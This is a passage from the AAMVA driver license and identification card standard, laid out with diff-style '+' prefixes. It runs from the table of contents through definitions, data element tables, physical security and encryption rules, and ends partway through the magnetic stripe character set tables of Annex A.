+C.15 Example MInutiae Record (Informative)......................................................................................51
+C.15.1 Data...............................................................................................................................................51
+C.15.2 Example Data Format Diagrams..................................................................................................52
+C.15.3 Raw Data for the Resulting Minutiae Record..............................................................................53
+Annex D (normative) Mapping of driver license/identification card info to optical memory cards............55
+Introduction.......................................................................................................................................................55
+D.1 Conformance.................................................................................................................................55
+D.2 File location...................................................................................................................................55
+D.3 Updating of data...........................................................................................................................55
+Annex E (normative) Mapping driver license/identification card info to 2 dimensional bar codes............57
+Introduction.......................................................................................................................................................57
+E.1 Conformance.................................................................................................................................57
+E.2 Symbology....................................................................................................................................57
+E.3 Card Characteristics.....................................................................................................................57
+E.3.1 Symbology Characteristics..........................................................................................................57
+E.3.2 Dimensions and Print Quality......................................................................................................57
+E.3.2.1 Narrow element dimension..........................................................................................................57
+E.3.2.2 Row height....................................................................................................................................58
+E.3.2.3 Quiet zone.....................................................................................................................................58
+E.3.2.4 Print Quality..................................................................................................................................58
+E.3.2.5 Sampling.......................................................................................................................................58
+E.3.2.6 Symbol Durability.........................................................................................................................58
+E.3.3 Bar code area................................................................................................................................58
+E.3.4 Orientation and Placement...........................................................................................................58
+E.3.4.1 PDF417 Orientation.......................................................................................................................58
+E.3.4.2 Designing the Card Layout...........................................................................................................59
+Figure E.1 — Orientation of PDF417 symbol on bottom.................................................................................59
+E.4 Information contents and formats...............................................................................................59
+vi
+
+E.4.1 Data Structure...............................................................................................................................59
+E.4.2 Header...........................................................................................................................................59
+Table E.1 — 2D symbols header format...........................................................................................................59
+E.4.3 Subfile Designator........................................................................................................................61
+E.4.4 Elements........................................................................................................................................61
+E.4.4.1 Required........................................................................................................................................61
+E.4.4.2 Optional.........................................................................................................................................61
+E.4.5 Example of 2D Symbol.................................................................................................................62
+E.5 Error Detection and Correction....................................................................................................65
+E.6 Character Sets...............................................................................................................................65
+E.7 Compression.................................................................................................................................65
+Annex F (normative) Driver license/identification card compression for digital imaging..........................67
+Introduction.......................................................................................................................................................67
+F.1 Conformance.................................................................................................................................67
+F.2 Definitions.....................................................................................................................................67
+F.3 Information Contents and Formats..............................................................................................70
+F.3.1 Requirements for Photographs and Signatures.........................................................................70
+F.3.1.1 Color Photo Images......................................................................................................................70
+F.3.1.1.1 Image Data Formats.....................................................................................................................70
+F.3.1.1.2 Image Compression Standard.....................................................................................................70
+F.3.1.1.3 Associated JPEG Parameters.....................................................................................................70
+F.3.1.1.3.1 Interchange Format......................................................................................................................70
+Table F.1 — Recommended File Interchange Format......................................................................................70
+Table F.2 — Recommended file interchange format........................................................................................71
+F.3.1.1.3.2 Color Space Translation..............................................................................................................72
+Table F.3 — Required for color images............................................................................................................72
+F.3.1.1.4 Options to Optimize Performance..............................................................................................72
+F.3.1.1.4.1 Sub sampling...............................................................................................................................72
+F.3.1.1.4.2 Interleaving...................................................................................................................................73
+vii
+
+F.3.1.1.4.3 Table Signaling............................................................................................................................73
+F.3.1.2 Signatures....................................................................................................................................73
+F.3.1.2.1 Image Data Formats....................................................................................................................73
+F.3.1.2.2 Image Compression Methods....................................................................................................73
+Table F.4 — Requirements for signatures gray scale......................................................................................74
+Table F.5 — Requirements for Signatures Binary...........................................................................................74
+F.3.1.3 Associated JPEG Parameters......................................................................................................75
+F.3.1.3.1 Interchange Format......................................................................................................................75
+F.3.1.4 Options to Optimize Performance..............................................................................................75
+F.3.1.4.1 Table Signaling.............................................................................................................................75
+F.4 Signature Compressed Vector Format........................................................................................75
+Figure F.1 Signature format..........................................................................................................................75
+F.4.1 File Header Format........................................................................................................................76
+F.4.1.1 Horizontal Resolution...................................................................................................................76
+F.4.1.2 Vertical Resolution.......................................................................................................................76
+F.4.1.3 Number of Vectors........................................................................................................................76
+F.4.2 Vector Data Format.......................................................................................................................76
+F.4.2.1 Small Offset...................................................................................................................................76
+F.4.2.2 Large Offset...................................................................................................................................76
+F.4.2.3 Pen Lift..........................................................................................................................................77
+Figure F.2 Signature data stream..................................................................................................................77
+F.5 Digital Images...............................................................................................................................77
+F.5.1 Category A - Facial Portrait Image (Capture)...............................................................................77
+F.5.1.1 Pose...............................................................................................................................................77
+F.5.1.2 Depth of Field................................................................................................................................77
+F.5.1.3 Centering.......................................................................................................................................78
+Figure F.3 Centering facial image.................................................................................................................78
+F.5.1.4 Lighting.........................................................................................................................................78
+F.5.1.5 Background...................................................................................................................................78
+F.5.1.6 Aspect Ratio..................................................................................................................................78
+viii
+
+F.5.1.7 Color Space...................................................................................................................................79
+F.5.1.8 Compression Algorithm...............................................................................................................79
+F.5.1.9 File Format....................................................................................................................................79
+F.5.2 Category A - Facial Portrait Image (Document).........................................................................79
+F.5.2.1 Aspect Ratio..................................................................................................................................79
+F.5.2.2 Facial Portrait Image Dimensions................................................................................................79
+F.5.2.3 Borders..........................................................................................................................................79
+F.5.3 Category B - Signature Images (Capture)....................................................................................79
+F.5.3.1 Digitization....................................................................................................................................79
+F.5.3.2 Compression and Storage............................................................................................................80
+F.5.3.3 File Format....................................................................................................................................80
+F.5.4 Category B - Signature Images (Document)................................................................................80
+F.5.4.1 Aspect Ratio..................................................................................................................................80
+F.5.4.2 Signature Image Dimensions.......................................................................................................80
+F.5.4.3 Borders..........................................................................................................................................80
+F.5.5 Category C - Finger Images (Capture).........................................................................................80
+F.5.5.1 Standards......................................................................................................................................80
+F.5.6 Category C - Finger Images (Document).....................................................................................81
+F.5.7 Category D - Ghosted Images (Capture)......................................................................................81
+F.5.8 Category D - Ghosted Images (Document)..................................................................................81
+Annex G (normative) Test Methods................................................................................................................83
+Introduction (informative).................................................................................................................................83
+G.1 Scope...........................................................................................................................................83
+G.2 Conformance...............................................................................................................................83
+G.3 Normative references..................................................................................................................83
+G.4 Terms and definitions.................................................................................................................84
+G.4.1 card service life..........................................................................................................................84
+G.5 Test methods and sample size...................................................................................................84
+G.6 Test report...................................................................................................................................86
+ix
+
+Annex H (informative) Physical security features for the driver license/identification card..........................87
+Introduction.......................................................................................................................................................87
+H.1 Features........................................................................................................................................87
+x
+
+Foreword
+(This foreword is not part of the AAMVA National Standard for the Driver License).
+The purpose of the Driver License Card standard is to provide a uniform means to identify (a) issuers and (b) holders
+of Driver License cards within the United States.
+The standard specifies minimum requirements for the presentation of identification information in human-readable
+form, and it specifies the format and data content of identification in the following technologies: magnetic stripe, bar
+code, integrated circuit cards, optical memory, and digital imaging.
+It is important to note that inclusion of any technology is optional; however, when a technology is used, it must comply
+fully with the standard.
+The scope of the standard is to specify identification information for Driver License applications. It does not standardize
+recording of driving related convictions or the withdrawal of driving privileges; however, in the high-capacity
+technologies, the standard employs international standard application coding such that additional applications may be
+possible on the same card.
+This standard is a U.S. Driver License application of existing international identification card standards that relate to
+physical characteristics, layout, data access and storage techniques, physical security requirements, and to
+registration procedures for identification of card issuers.
+Work on this standard began in 1997 and is a result of cooperation between ANSI NCITS B10, the American
+Association of Motor Vehicle Administrators (AAMVA) and their Industry Advisory Board. The development involved
+broad-based project teams including state driver license agencies, government, equipment and software suppliers,
+card vendors, and consultants.
+This standard meets the following objectives:
+¾ uniquely identifies the card issuer and cardholder;
+¾ brings uniformity to the millions of Driver License cards now in circulation;
+¾ encourages transition from existing practice to the new standard;
+¾ assists administrative efficiency and accuracy through machine-readable identification within a foundation that
+encourages future applications;
+¾ facilitates future development in technology and application.
+Requests for interpretation, suggestions for improvement or addenda, or defect reports are welcome. Please send
+these to the Standards Program Director, AAMVAnet, 4301 Wilson Boulevard – Suite 400, Arlington, VA 22203
+(www.aamva.org).
+xi
+
+Driver License Cards - Identification Cards
+1 Scope
+This AAMVA National Standard specifies directly or by reference the requirements for cards used in driver license
+applications. It takes into consideration both human and machine aspects and states the minimum requirements for
+conformity. It contains physical characteristics, layout, data access techniques, data storage techniques, registration
+procedures, and security requirements. Security measures are defined as minimum requirements but card issuers are
+free to have more stringent security features.
+2 Conformance
+An identification card is in conformance with this standard if it meets all mandatory requirements specified directly or
+by reference herein.
+3 Normative reference(s)
+The following normative documents contain provisions, which, through reference in this text, constitute provisions of
+this AAMVA National Standard. For dated references, subsequent amendments to, or revisions of, any of these
+publications do not apply. However, parties to agreements based on this AAMVA National Standard are encouraged to
+investigate the possibility of applying the most recent editions of the normative documents indicated below. For
+undated references, the latest edition of the normative document referred to applies. Members of ANSI, ISO and IEC
+maintain registers of currently valid National and International Standards.
+ANSI-D20: 1998, Data Element Dictionary for Traffic Records Systems
+ANSI/ASQC Z1.4: Military Standard, Sampling Procedures and Tables for Inspection by Attributes
+ANSI/NIST-CSL1-1993, “Data Format for the Interchange of Fingerprint Information”
+ANSI X3.182 Bar-Code Print Quality
+ASCII/ISO 8859-1: “Information Processing - 8bit single byte coded graphic character sets - Part 1: Latin alphabet No.
+1” 1998
+BioAPI Specification Version 1.00 : March 30, 2000 - The BioAPI Consortium
+CJIS/FBI IAFIS-IC-0110 Wavelet Scalar Quantization (WSQ)
+CJIS-RS-0010 Appendix G “Interim IAFIS Image Quality Specifications for Scanners”
+ISO/IEC 646: 1991, Information technology - ISO 7-bit coded character set for information interchange
+ISO/IEC 7810: 1995, Identification cards - Physical characteristics
+ISO/IEC 7811-6: 1996, Identification cards - Recording technique - Part 6: High coercivity magnetic stripe
+1
+
+ISO 7816-1: 1987, Identification cards - Integrated circuit(s) cards with contacts - Part 1: Physical characteristics
+ISO 7816-2: 1988, Identification cards - Integrated circuit(s) cards with contacts - Part 2: Dimensions and location of
+contacts
+ISO/IEC 7816-3: 1997, Identification cards - Integrated circuit(s) cards with contacts - Part 3: Electronic signals and
+transmission protocols
+ISO/IEC 7816-4: 1995, Identification cards - Integrated circuit(s) cards with contacts - Part 4: Inter-industry commands
+ISO/IEC 7816-5: 1994, Identification cards - Integrated circuit(s) cards with contacts - Part 5: Numbering system and
+registration procedure for application identifiers
+ISO/IEC 7816-6: 1996, Identification cards - Integrated circuit(s) cards with contacts - Part 6: Inter-industry data
+elements
+ISO/IEC 10373: 1993, Identification cards - Test methods
+Except for Clause 6.4 through 6.8, this standard has been superseded by:
+ISO/IEC 10373-1: 1998, Identification Cards - Test Methods - Part 1: General characteristics tests
+ISO/IEC 10373-1: 1998, Identification Cards - Test Methods - Part 2: Cards with mag stripes
+ISO/IEC 10373-1: 1998, Identification Cards - Test Methods - Part 5: Optical memory cards
+ISO/IEC 10536-1: 1992, Identification cards - Contactless integrated circuit(s) cards - Part 1: Physical characteristics
+ISO/IEC 10536-2: 1995, Identification cards - Contactless integrated circuit(s) cards - Part 2: Dimensions and
+locations of coupling areas
+ISO/IEC 10536-3: 1996, Identification cards - Contactless integrated circuit(s) cards - Part 3: Electrical signals and
+mode switching
+ISO 10918-1: Information Technology - Digital compression and coding of continuous-tone-still images: Requirements
+and Guidelines
+ISO/IEC 11693: 1994, Identification cards - Optical memory cards - general characteristics
+ISO/IEC 11694-1: 1994, Identification cards, Optical memory cards - Linear recording method Part 1: Physical
+characteristics
+ISO/IEC 11694-2: 1995, Identification cards, Optical memory cards - Linear recording method Part 2: Dimensions and
+location of the accessible optical area
+ISO/IEC 11694-3: 1995, Identification cards, Optical memory cards - Linear recording method Part 3: Optical
+properties and characteristics
+ISO/IEC 11694-4: 1996, Identification cards, Optical memory cards - Linear recording method Part 4: Logical data
+structures
+ISO/IEC 14443-1: Identification cards - Contactless integrated circuit cards - Proximity cards Part 1: Physical
+characteristics
+ISO/IEC 14443-2: Identification cards - Contactless integrated circuit cards - Proximity cards Part 2: Radio frequency
+power and signal interface
+ISO/IEC 14443-3: Identification cards - Contactless integrated circuit cards - Proximity cards Part 3: Initialization and
+anticollision
+2
+
+ISO/IEC 14443-4: Identification cards - Contactless integrated circuit cards - Proximity cards Part 4: Transmission
+protocols
+ISO/IEC 15438: Automatic Identification and Data Capture Techniques - International Two-dimensional Symbology
+Specification - PDF417
+ISO/IEC 15693-1: Identification cards - Contactless integrated circuit(s) cards - Vicinity cards - Part 1: Physical
+characteristics
+ISO/IEC 15693-2: Identification cards - Contactless integrated circuit(s) cards - Vicinity cards - Part 2: Air interface and
+initialisation
+ISO/IEC 15693-3: Identification cards - Contactless integrated circuit(s) cards - Vicinity cards - Part 3: Protocols
+ISO/IEC 15693-4: Identification cards - Contactless integrated circuit(s) cards - Vicinity cards - Part 4: Registration of
+applications/issuers
+MIL-L-61002 Labels, Pressure Sensitive Adhesive, for Bar-Codes and other Markings
+4 Term(s) and definition(s)
+For the purposes of this AAMVA National Standard, the following terms and definitions apply:
+4.1
+driver license card
+a card used to identify the card issuer and the card holder to facilitate Driver License transactions and to provide input
+data for such transactions
+4.2
+driver license card issuer
+an organization that issues Driver License cards such as a Department of Motor Vehicles and the U.S. Department of
+State
+4.3
+driver license card holder
+an individual to whom a Driver License card is issued
+4.4
+numeric (N)
+digits 0 to 9
+4.5
+special characters (S)
+! “ # $ % & ‘ ( ) * + , - . / : ; < = > ? [ \ ] ^ _ @. A special character is removed from this category when it is used as a
+delimiter.
+4.6
+alphabetic (A)
+alpha characters (UPPERCASE letters from A to Z)
+4.7
+alphanumeric (ANS)
+alpha characters (UPPERCASE letters from A to Z), numeric characters, space, and special characters
+3
+
+4.8
+front side of card
+face of the card carrying visual information containing the card issuer and card holder identifiers
+4.9
+back side of card
+the opposite face from the front
+4.10
+signature panel
+area used for DL cardholder signature that is receptive to writing instruments
+4.11
+DF
+dedicated files
+4.12
+EF
+elementary files
+4.13
+MF
+master files
+4.14
+CICCD
+contactless integrated circuit card device
+4.15
+CICC
+contactless integrated circuit card
+4.16
+ICC
+integrated circuit card
+4.17
+DL
+driver license
+4.18
+ID
+identification card
+4.19
+AKA
+also known as
+4.20
+IIN
+issuer identification number
+4.21
+digital
+any data that is composed of a discrete sample or collection of discrete samples that are represented as finite
+numbers
+4
+
+4.22
+image
+digital data that represents the visual likeness of its subject, such as a portrait, finger, or signature. Images may be
+collected, stored, and rendered for visual inspection using a variety for digital formats
+5 Physical characteristics and card technologies
+Various card technologies may be employed at the option of the card issuer subject to the restrictions described in 5.1
+and 5.2. None of these card technologies are required on the card, however, if they are used they shall be
+implemented as defined in the appropriate annex.
+5.1 Physical characteristics
+Physical characteristics of cards that employ none of the optional card technologies are at the discretion of the card
+issuer provided that, after any folding, there is a front side and a back side as defined herein. Additional physical
+characteristics, if any, related to each card technology are specified in the annex for that card technology.
+5.2 Card technologies
+Available card technologies are shown in the following list. It is possible that certain types of card technologies may be
+incompatible in combination.
+Annex Technology Use of technology on card
+A Magnetic stripe cards Optional
+B Integrated circuit cards (ICC) Optional
+C Finger imaging Optional
+D Optical memory cards Optional
+E Bar codes, 2 dimensional Optional
+F Data compression for digital images Optional
+5.3 Durability of card structure
+Durability of the card is not established in this standard. Each jurisdiction shall select which test methods to use, if any,
+and what minimum acceptable criteria to use, if any, based on a mutual agreement between the jurisdiction and their
+card supplier. If card durability testing is required then one or more of the test methods listed in Annex G shall be
+used. The jurisdiction shall communicate the mutually agreed to test method and criteria information to the card
+supplier prior to any card procurement request.
+6 Data elements
+Human-readable information is information that is printed or embossed on the surface of a Driver License card. This
+section also describes the information that can be electronically stored on the card. Annexes specify the mapping of
+this information to specific technologies. Data element definitions, length, and type shall follow ANSI D20.
+6.1 Description of table headings
+6.1.1 Reference Number
+A number for each data element used in this standard.
+5
+
+6.1.2 Data element/label
+Data element is the clear name of the data element. When used as a human readable element the label is the
+identifying “heading” before, after, over, or under the element as it appears on the DL/ID document. The label is shown
+in bold under the data element name (i.e., “date of birth” would be “d.o.b.”).
+6.1.3 Usage
+The various uses for the data element. H = human readable, M = machine readable, B = both.
+6.1.4 Definition
+A statement of meaning and the attributes of the data element. In the case of a different definition or format between
+the data element for the purposes of being (Human) or (Machine) readable, the distinction has been provided.
+6.1.5 Field length and type
+The valid field length for each data element. The following refer to the valid characters used (A=alpha A-Z, N=numeric,
+S=special) in the related application. See ANSI D20. Magnetic Stripe data element length when different has been
+noted.
+6.1.6 Address requirement
+The “mailing” related address fields were selected as the default to provide driver address information versus the
+“residence” optional fields. The “residence” fields may be substituted for the “mailing” fields but shall adhere to the
+length and type specified herein.
+6
+
+6.2 Required data elements
+Table 1 — Required data elements
+Ref. # Data Usage Definition Field length & type
+element/label
+1 Driver License B NAME of the individual holding Variable 35/AS
+Name the Driver License or ID as
+defined in ANSI D20 Data
+Dictionary.
+(Lastname@Firstname@MI@
+suffix if any) (Machine, Mag
+Stripe uses ‘$’ and Bar Code
+uses ‘,’ in place of ‘@’)
+Firstname, Middle Initial,
+Lastname (Human)
+2 Driver Mailing B The place where the registered Variable 35/ANS
+Street Address 1 driver of a vehicle (individual or Variable 29/ANS
+corporation) may be contacted (Mag Stripe only)
+such as a house number, street
+address etc.
+3 Driver Mailing City B NAME OF CITY for mailing Variable 20/ANS
+address. Variable max
+13/ANS
+(Mag Stripe only)
+4 Driver Mailing B JURISDICTION CODE for Fixed 2/AN
+Jurisdiction Code mailing address. Conforms to
+Canadian, Mexican and US
+Jurisdictions as appropriate.
+Codes for provinces (Canada)
+and states (US and Mexico).
+5 Driver Mailing B POSTAL CODE used for Fixed 11/ANS
+Postal Code mailing. (As used by Canadian,
+Mexican and US jurisdictions.)
+6 Driver License/ID B NUMBER assigned or Variable 25/AN
+Number calculated by the jurisdiction Variable max 13/N
+DL# which identifies the Driver or ID (Mag Stripe only)
+Holder.
+7 ID/DL # * M Overflow for numbers longer Fixed 5/N
+(Mag Stripe only) than 13 characters. (Mag Stripe only)
+8 Driver License B A=Class A; B=Class B; Fixed 4/AN
+Classification C=Class C (Class A, B and C Fixed 2/AN (Mag
+Code are defined by Federal Highway Stripe only)
+regulations); M=Class M
+motorcycle as defined by
+AAMVA; others are defined by
+DL Classification Code
+Standards.
+9 Driver License B A restriction applicable to a Fixed 10/AN
+Restriction Code driver license.
+7
+
+Ref. # Data Usage Definition Field length & type
+element/label
+10 Driver License B Any endorsements on a driver Fixed 5/AN
+Endorsement license which authorize the
+Code operation of specified types of
+vehicles or the operation of
+vehicles carrying specified
+loads. Endorsements shall be
+specific to classification of a
+driver license.
+11 Driver License B YYMM, CCYYMMDD Fixed 8/N
+Expiration Date Year, Month, Day (Machine) Fixed 4/N
+exp. Month, Day, Year (Human) (Mag Stripe only)
+12 Date of Birth B CCYYMMDD (Machine) Fixed 8/N
+d.o.b. Month, Day, Year (Human)
+13 Driver Sex B DRIVER SEX as defined by the 1/N
+sex ANSI D20 standard. (Machine)
+M for Male, F for Female
+(Human)
+14 Driver License or B CCYYMMDD (Machine) 8/N
+ID Document Month, Day, Year (Human)
+Issue Date
+iss.
+15 ISO Issuer M This is the assigned Fixed 6/N
+Identifier Number identification number from ISO.
+(IIN) This number shall always begin
+with a “6”.
+16 Driver License or B Indicates that the document is a
+Identification Card driver license or identification
+Identifier card, whichever is applicable.
+17 Color Photograph B The card holder’s photograph or
+or Image image.
+18 Signature B The card holder’s signature.
+holder’s
+signature
+19 Security Features B To deter alteration and
+counterfeiting.
+6.3 Optional data elements
+Table 2 — Optional data elements
+Ref. # Data Usage Definition Field length & type
+element/label
+20 Height (FT/IN) B FEET (1); Inches (2). Ex. 509 = 3/N
+hgt 5 ft., 9 in.
+21 Weight (LBS) B WEIGHT in LBS. 3/N
+wgt
+22 Eye Color B EYE COLOR as defined by the 3/AN
+eyes ANSI D20 standard.
+23 Hair Color B HAIR COLOR as defined by the 3/AN
+hair ANSI D20 standard.
+8
+
+Ref. # Data Usage Definition Field length & type
+element/label
+24 Social Security B The number assigned to an 9/N
+Number individual by the Social Security
+Administration.
+25 Driver Permit B Identifies the type of permit as 2/A
+Classification defined by ANSI D20.
+Code
+26 Driver Permit B CCYYMMDD; Date permit 8/N
+Expiration Date expires (Machine)
+Month, Day, Year (Human)
+27 Permit Identifier B Type of permit. 25/AN
+28 Driver Permit B CCYYMMDD; Date permit was 8/N
+Issue Date issued. (Machine)
+Month, Day, Year (Human)
+29 Driver Permit B PERMIT RESTRICTIONS as 10/AN
+Restriction Code defined by ANSI D20.
+30 Driver Permit B PERMIT ENDORSEMENTS as 6/AN
+Endorsement defined by ANSI D20.
+Code
+31 Driver Last Name B LAST NAME or SURNAME of 35/AN
+(except Mag the individual holding the Driver
+Stripe) License or ID. Hyphenated
+names acceptable, but no other
+use of special symbols.
+32 Driver First Name B FIRST NAME or GIVEN NAME 35/AN
+(except Mag of the individual holding the
+Stripe) Driver License or ID.
+Hyphenated names acceptable,
+but no other use of special
+symbols.
+33 Driver Middle B MIDDLE NAME(s) or INITIALS 35/AN
+Name or Initial (except Mag of the individual holding the
+Stripe) Driver License or ID.
+Hyphenated names acceptable,
+spaces between names
+acceptable, but no other use of
+special symbols.
+34 Driver Name B An affix occurring at the end of 3/AN
+Suffix (except Mag a word, e.g.; Sr., Jr., II, III, IV,
+Stripe) etc.
+35 Driver Name B PREFIX to Driver Name. Not 5/AN
+Prefix (except Mag defined in ANSI D20. Freeform
+Stripe) as defined by issuing
+jurisdiction.
+36 Driver Mailing B STREET ADDRESS LINE 2. 35/AN
+Street Address 2 (except Mag (MAILING)
+Stripe)
+37 Driver Residence B STREET ADDRESS LINE 1. 35/AN
+Street Address 1 (except Mag (MAILING)
+Stripe)
+9
+
+Ref. # Data Usage Definition Field length & type
+element/label
+38 Driver Residence B STREET ADDRESS LINE 2. 35/AN
+Street Address 2 (except Mag (MAILING)
+Stripe)
+39 Driver Residence B NAME OF CITY for mailing 20/AN
+City (except Mag address.
+Stripe)
+40 Driver Residence B JURISDICTION CODE for 2/AN
+Jurisdiction Code (except Mag mailing address. Conforms to
+Stripe) Canadian, Mexican and US
+Jurisdictions as appropriate.
+Codes for provinces (Canada)
+and states (US and Mexico).
+41 Driver Residence B POSTAL CODE of Residence 11/AN
+Postal Code (except Mag
+Stripe)
+42 Height B HEIGHT in CENTIMETERS 3/N
+(CM) (except Mag
+Stripe)
+43 Weight B WEIGHT in KILOGRAMS 3/N
+(KG) (except Mag
+Stripe)
+44 Issue Timestamp M A string used by some 26/N
+(except Mag jurisdictions to validate the
+Stripe) document against their data
+base.
+45 Number of B Number of duplicate cards 2/N
+Duplicates (except Mag issued for a license or ID if any.
+Stripe)
+46 Medical B STATE SPECIFIC. Freeform; 20/AN
+Indicator/Codes (except Mag Standard "TBD"
+Stripe)
+47 Organ Donor B STATE SPECIFIC. Freeform; 10/AN
+(except Mag Standard "TBD"
+Stripe)
+48 Non-Resident B "Y"; Used by some jurisdictions 1/A
+Indicator (except Mag to indicate holder of the
+Stripe) document is a non-resident.
+49 Unique Customer B A number or alphanumeric 25/AN
+Identifier (except Mag string used by some
+Stripe) jurisdictions to identify a
+"customer" across multiple data
+bases.
+50 Driver "AKA" Date B ALTERNATIVE DATES(S) 8/N
+Of Birth (except Mag given as date of birth.
+Stripe)
+51 Driver "AKA" B FORMAT SAME AS DRIVER 9/N
+Social Security (except Mag SOC SEC NUM.
+Number Stripe) ALTERNATIVE NUMBERS(S)
+used as SS NUM.
+10
+
+Ref. # Data Usage Definition Field length & type
+element/label
+52 Driver "AKA" B ALTERNATIVE NAME(S) of the 35/AN
+Name (except Mag individual holding the Driver
+Stripe) License or ID. FORMAT same
+as defined in ANSI D20 Data
+Dictionary.
+(Lastname@Firstname@MI@
+suffix if any.)
+53 Driver "AKA" Last B ALTERNATIVE LAST NAME or 35/AN
+Name (except Mag SURNAME of the individual
+Stripe) holding the Driver License or ID.
+Hyphenated names acceptable,
+but no other use of special
+symbols.
+54 Driver "AKA" First B ALTERNATIVE FIRST NAME 35/AN
+Name (except Mag or GIVEN NAME of the
+Stripe) individual holding the Driver
+License or ID. Hyphenated
+names acceptable, but no other
+use of special symbols.
+55 Driver "AKA" B ALTERNATIVE MIDDLE 35/AN
+Middle Name (except Mag NAME(s) or INITIALS of the
+Stripe) individual holding the Driver
+License or ID. Hyphenated
+names acceptable, spaces
+between names acceptable, but
+no other use of special symbols.
+56 Driver "AKA" B ALTERNATIVE SUFFIX as 3/AN
+Suffix (except Mag defined in ANSI D20.
+Stripe)
+57 Driver "AKA" B ALTERNATIVE PREFIX to 5/AN
+Prefix (except Mag Driver Name. Not defined in
+Stripe) ANSI D20. Freeform as defined
+by issuing jurisdiction.
+6.4 Format conventions
+6.4.1 Character set
+Unless otherwise specified, the information elements are alphanumeric as defined in clause 4.
+6.4.2 Format of dates
+Human-readable dates shall be shown as 6 characters, "mm/dd/yy", where mm = 2-digit month, dd = 2-digit day, and
+yy = 2 last digits of year; or if the day is not required, as 4 characters, "mm/yy"; or if century is required, as 8 or 6
+characters, "mm/dd/ccyy" or "mm/ccyy", where cc = century.
+11
+
+7 Physical security
+7.1 Definitions
+The industry definitions of overt, covert, first line inspection, second line inspection, and third line inspection are as
+follows and apply to this standard for the purposes of identifying and grouping the following security features.
+7.1.1 Covert
+Security features that are hidden in the document and are not intended to be made public. Used by Motor Vehicle
+Administrators and law enforcement for document authentication and forensic purposes. (C=Covert)
+7.1.2 Overt
+A security feature that is visible or apparent without requiring special instruments. May require some instruction on
+how to observe it. The feature may be particularly visible on the genuine document (a passive visible feature) or may
+only show after a copy has been made. (O=Overt)
+7.1.3 First line inspection
+Cursory examination without tools or aids involves easily identifiable visual or tactile features for rapid inspection at
+point of usage. (1=First Line Inspection)
+7.1.4 Second line inspection
+Examination by trained inspectors with simple equipment (magnifying glass, UV light, machine reading equipment,
+etc.). (2=Second Line Inspection)
+7.1.5 Third line inspection
+Inspection by forensic specialists conducting detailed examination allows for more in-depth evaluation and may require
+special equipment to provide true certification. (3=Third Line Inspection)
+7.2 Physical security requirement
+Jurisdictions issuing driver licenses and identification documents shall incorporate one or more overt security features
+(e.g., optically variable devices) designed to limit tampering, counterfeiting, photocopying, or otherwise duplicating the
+license or document for fraudulent purposes and to limit use of the license or document from impostors. Jurisdictions
+should also include one or more covert security features (e.g., machine-readable technologies) to further safeguard
+the license or document. Acceptable security features include, but are not limited to, the list found in Annex H of this
+document.
+8 Encryption
+This standard will not address which data should be encrypted and how. Rather, there are certain elements that must
+not be encrypted and conformance can be achieved only by leaving them accessible (not encrypted and readable) in
+one of the technology formats specified herein. Under no circumstances may any Header as defined in Section E.4.2
+or the Subfile designators as defined in E.4.3 be encrypted.
+Users at a minimum shall not encrypt the Data Elements outlined in Table 3:
+12
+
+Table 3 — Minimum Non-encrypted data elements
+Ref. # Data Element
+1 Driver License Name
+6 Driver License/ID Number
+11 Driver License Expiration Date
+12 Date of Birth
+15 ISO Issuer Identification Number (IIN) Example: 636000 (Virginia)
+NOTE It is strongly recommended that all fields be left unencrypted in order to gain the maximum benefit from the use of a
+Machine Readable technology. The Machine Readable information shall also be visible (human readable) on the DL/ID card as a
+secondary verification method. The Machine Readable information shall not be encrypted unless privacy protection acts or
+specific legislation mandates it by law. The Machine Readable information must give enough information on the license holder so
+that it is usable by the various communities as a Machine Readable verification or audit methodology.
+13
+
+14
+
+Annex A
+(normative)
+Mapping of driver license/identification card information to magnetic stripe
+cards
+Introduction
+This annex defines mapping of the DL/ID card machine-readable data elements, as defined in clause 6, onto a
+magnetic stripe card.
+A.1 Conformance
+Conformance with all parts of ISO/IEC 7811-6 is required with the exception of data content and coded character sets
+as defined in Table A.1 and A.2.
+A.2 Card characteristics
+The physical characteristics and dimensions shall conform to ISO/IEC 7810. The magnetic stripe area shall conform to
+ISO/IEC 7811-6 for tracks 1, 2, and 3.
+A.3 Coded character set
+Tables A.1 and A.2 define characters for tracks 1, 2, and 3. The coded character sets for 5 bit numeric and 7 bit
+alphanumeric are the same as those described in ISO/IEC 7811-6. However, the use of the characters for data or
+control purposes may be different.
+Table A.1 — Coded character set for 5 bit numeric
+ASCII Hex Binary ASCII Hex Binary
+P 23 22 21 20 P 23 22 21 20
+0 30 1 0 0 0 0 8 38 0 1 0 0 0
+1 31 0 0 0 0 1 9 39 1 1 0 0 1
+2 32 0 0 0 1 0 : 3A 1 1 0 1 0
+3 33 1 0 0 1 1 ; 3B 0 1 0 1 1
+4 34 0 0 1 0 0 < 3C 1 1 1 0 0
+5 35 1 0 1 0 1 = 3D 0 1 1 0 1
+6 36 1 0 1 1 0 > 3E 0 1 1 1 0
+7 37 0 0 1 1 1 ? 3F 1 1 1 1 1
+The 3 characters : < > are available for hardware control purposes and shall not be used for
+information (data content).
+The 3 characters ; = ? shall have the following meaning:
+; start sentinel
+= field separator
+? end sentinel
+15
+
+Table A.2 — Coded character set for 7 bit alphanumeric
+ASCII Hex Binary ASCII Hex Binary
+P 25 24 23 22 21 20 P 25 24 23 22 21 20
+space 20 1 0 0 0 0 0 0 @ 40 0 1 0 0 0 0 0
+! 21 0 0 0 0 0 0 1 A 41 1 1 0 0 0 0 1
+“ 22 0 0 0 0 0 1 0 B 42 1 1 0 0 0 1 0
+# 23 1 0 0 0 0 1 1 C 43 0 1 0 0 0 1 1
+$ 24 0 0 0 0 1 0 0 D 44 1 1 0 0 1 0 0
+% 25 1 0 0 0 1 0 1 E 45 0 1 0 0 1 0 1
+& 26 1 0 0 0 1 1 0 F 46 0 1 0 0 1 1 0
+‘ 27 0 0 0 0 1 1 1 G 47 1 1 0 0 1 1 1
+( 28 0 0 0 1 0 0 0 H 48 1 1 0 1 0 0 0
+) 29 1 0 0 1 0 0 1 I 49 0 1 0 1 0 0 1
+* 2A 1 0 0 1 0 1 0 J 4A 0 1 0 1 0 1 0
++ 2B 0 0 0 1 0 1 1 K 4B 1 1 0 1 0 1 1
+, 2C 1 0 0 1 1 0 0 L 4C 0 1 0 1 1 0 0
+- 2D 0 0 0 1 1 0 1 M 4D 1 1 0 1 1 0 1
+. 2E 0 0 0 1 1 1 0 N 4E 1 1 0 1 1 1 0
+/ 2F 1 0 0 1 1 1 1 O 4F 0 1 0 1 1 1 1
+0 30 0 0 1 0 0 0 0 P 50 1 1 1 0 0 0 0
+1 31 1 0 1 0 0 0 1 Q 51 0 1 1 0 0 0 1
